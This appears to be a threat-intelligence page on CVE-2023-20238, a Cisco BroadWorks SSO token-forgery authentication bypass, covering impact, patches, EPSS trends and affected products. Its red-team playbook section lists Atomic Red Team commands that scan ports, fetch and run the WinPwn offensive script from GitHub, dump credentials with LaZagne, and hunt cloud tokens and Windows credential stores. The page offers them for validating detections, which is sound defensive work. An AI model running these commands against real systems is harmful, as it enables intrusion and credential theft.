CVE-2023-20238
Overview
This vulnerability is an authentication bypass stemming from flawed validation of single sign-on (SSO) tokens within Cisco BroadWorks Application Delivery Platform and Xtended Services Platform. The root cause lies in the inadequate verification mechanism that accepts forged SSO credentials. The affected components are the SSO implementation modules responsible for token validation in these Cisco BroadWorks platforms.
Vulnerability Description
A vulnerability in the single sign-on (SSO) implementation of Cisco BroadWorks Application Delivery Platform and Cisco BroadWorks Xtended Services Platform could allow an unauthenticated, remote attacker to forge the credentials required to access an affected system. This vulnerability is due to the method used to validate SSO tokens. An attacker could exploit this vulnerability by authenticating to the application with forged credentials. A successful exploit could allow the attacker to commit toll fraud or to execute commands at the privilege level of the forged account. If that account is an Administrator account, the attacker would have the ability to view confidential information, modify customer settings, or modify settings for other users. To exploit this vulnerability, the attacker would need a valid user ID that is associated with an affected Cisco BroadWorks system.
Impact
An unauthenticated remote attacker who possesses a valid user ID can exploit this vulnerability to forge credentials and bypass authentication controls. This enables actions such as committing toll fraud, executing commands with the privileges of the forged account, and if an Administrator account is impersonated, viewing confidential data and modifying user or customer settings. The attack requires network access but no user interaction or prior authentication (CVSS vector AV:N/AC:L/PR:N/UI:N). The vulnerability allows complete compromise of the affected system’s access controls, potentially leading to data breaches and operational disruption.
Solution
Cisco has released security updates addressing this vulnerability in Cisco BroadWorks Application Delivery Platform versions ri.2023.06 and ri.2023.07, as well as BroadWorks Xtended Services Platform versions 2023.06 and 2023.07. Administrators should apply the patches as detailed in Cisco Security Advisory cisco-sa-bw-auth-bypass-kCggMWhX available at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bw-auth-bypass-kCggMWhX. No alternative mitigations are specified; prompt patching is recommended to remediate the flaw.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the single sign-on (SSO) implementation of Cisco's BroadWorks Application Delivery Platform and Xtended Services Platform stems from inadequate validation of SSO tokens. This flaw allows an unauthenticated remote attacker to forge credentials, potentially gaining unauthorized access to the affected systems. The root cause lies in the method employed for token validation, which fails to ensure the authenticity of the credentials being used. Consequently, an attacker can exploit this weakness to impersonate legitimate users, leading to unauthorized actions within the system.
Exploitation of this vulnerability can occur through various attack vectors. An attacker must possess a valid user ID associated with the affected Cisco BroadWorks system, which could be obtained through social engineering, phishing, or other means. Once the attacker has this information, they can forge SSO tokens to authenticate themselves as the legitimate user. This could lead to various malicious activities, including toll fraud, where the attacker makes unauthorized calls at the expense of the organization. If the compromised account has administrative privileges, the attacker could execute commands with elevated rights, allowing them to access sensitive data, modify customer settings, and alter configurations for other users, thereby amplifying the potential damage.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on Cisco's BroadWorks platforms for their telecommunication services. The potential for toll fraud poses a direct financial risk, as attackers could exploit the system to incur costs that the organization would ultimately bear. Furthermore, the ability to access and manipulate sensitive information can lead to data breaches, loss of customer trust, and reputational damage. Organizations may also face regulatory scrutiny and compliance issues if sensitive data is exposed or misused, resulting in legal liabilities and financial penalties.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regular security assessments and penetration testing can help identify weaknesses in the SSO implementation and validate the effectiveness of existing security controls. Additionally, implementing robust logging and monitoring solutions can aid in the detection of anomalous behavior, such as unauthorized access attempts or unusual account activity. Organizations should also ensure that they are running the latest versions of the affected Cisco products, as timely patching is crucial in addressing known vulnerabilities. Furthermore, educating employees about the risks associated with credential theft and the importance of secure password practices can help reduce the likelihood of successful exploitation.
In conclusion, the vulnerability in the SSO implementation of Cisco's BroadWorks platforms presents a critical risk that organizations must address promptly. The potential for unauthorized access and the subsequent consequences underscore the importance of robust security measures. By understanding the technical details, potential attack vectors, and real-world impacts, organizations can better prepare themselves to defend against such threats. Implementing effective detection and mitigation strategies will be essential in safeguarding sensitive information and maintaining the integrity of their telecommunication systems.
CSURFACE threat intelligence has identified a marked increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2023-20238, rising by over 45% to a current level that places it near the top percentile of predicted exploitation likelihood. This upward trend, coupled with a steady week-over-week increase, signals growing interest or preparatory activity by threat actors, although no new exploit code or active campaigns have been detected by our telemetry to date. The significance of this development lies in the heightened probability that adversaries may soon attempt to leverage the vulnerability, which remains critical due to its potential to grant unauthorized access through forged SSO credentials. Consequently, the risk posture for organizations using Cisco BroadWorks platforms should be considered elevated, warranting increased vigilance in monitoring for exploitation attempts and anomalous authentication behaviors. While the absence of confirmed exploitation events tempers immediate alarm, the evolving EPSS trajectory underscores the necessity for defenders to anticipate potential shifts in the threat landscape surrounding this vulnerability.
Affected Products (5)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Cisco | Broadworks Application Delivery Platform | ri.2023.06 |
cpe:2.3:a:cisco:broadworks_application_delivery_platform:ri.2023.06:*:*:*:*:*:*:*
|
|
|
Cisco | Broadworks Application Delivery Platform | ri.2023.07 |
cpe:2.3:a:cisco:broadworks_application_delivery_platform:ri.2023.07:*:*:*:*:*:*:*
|
|
|
Cisco | Broadworks Xtended Services Platform | All |
cpe:2.3:a:cisco:broadworks_xtended_services_platform:*:*:*:*:-:*:*:*
|
|
|
Cisco | Broadworks Xtended Services Platform | 2023.06 |
cpe:2.3:a:cisco:broadworks_xtended_services_platform:2023.06:*:*:*:release_independent:*:*:*
|
|
|
Cisco | Broadworks Xtended Services Platform | 2023.07 |
cpe:2.3:a:cisco:broadworks_xtended_services_platform:2023.07:*:*:*:release_independent:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-20238 |
| sec.cloudapps.cisco.com |
GitHub CVE
|
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-bw-auth-bypass-kCggMWhX |